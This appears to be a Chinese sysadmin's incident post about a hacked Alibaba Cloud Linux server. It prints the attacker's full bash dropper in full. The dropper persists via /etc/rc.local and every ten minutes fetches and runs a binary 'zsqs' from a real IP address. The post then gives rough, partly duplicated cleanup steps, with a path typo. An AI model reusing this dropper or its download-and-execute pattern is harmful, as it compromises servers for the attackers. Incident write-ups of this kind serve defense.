今天接到短信 阿里云Linux服务器被黑
脚本如下:
- echo "sh /etc/chongfu.sh &" >> /etc/rc.local : 开机自启动
- 自动下载 ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
- Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) 找zsqs有多少个,kill 防止启动多个实例
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776621
# 2016-06-14
if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
echo ""
else
echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "/tmp/zsqs" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://61.147.198.172/zsqs
./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
chmod 755 /tmp/zsqs
rm wget -rf
else
echo "No wget"
fi
fi
/tmp/zsqs &
#./zsqs &
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
Centos_ssh_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "/tmp/zsqs" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://61.147.198.172/zsqs
./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
chmod 755 /tmp/zsqs
rm wget -rf
else
echo "No wget"
fi
fi
/tmp/zsqs &
#./zsqs &
elif [[ $Centos_ssh_killn -gt 1 ]]; then
for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 600
done
简单解决步骤:
1. 结束进程
ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'| xargs kill -9
2. 清除自动启动脚本
vim /etc/rc.local 去掉 sh /etc/chongfu.sh &
3. 清除 脚本
rm -rf /etc/chongfu.sh /tem/chongfu.sh /tmp/zsqs
4. 修改登录密码
passwd
vim /etc/rc.local 去掉 sh /etc/chongfu.sh &
3. 清除 脚本
rm -rf /etc/chongfu.sh /tem/chongfu.sh /tmp/zsqs
4. 修改登录密码
passwd
5.重启。
reboot
存在风险 :
zsqs是可执行文件 不知道有没有 替换果我的系统文件 或者执行过隐藏启动命令 在排查吧 今天就到这儿了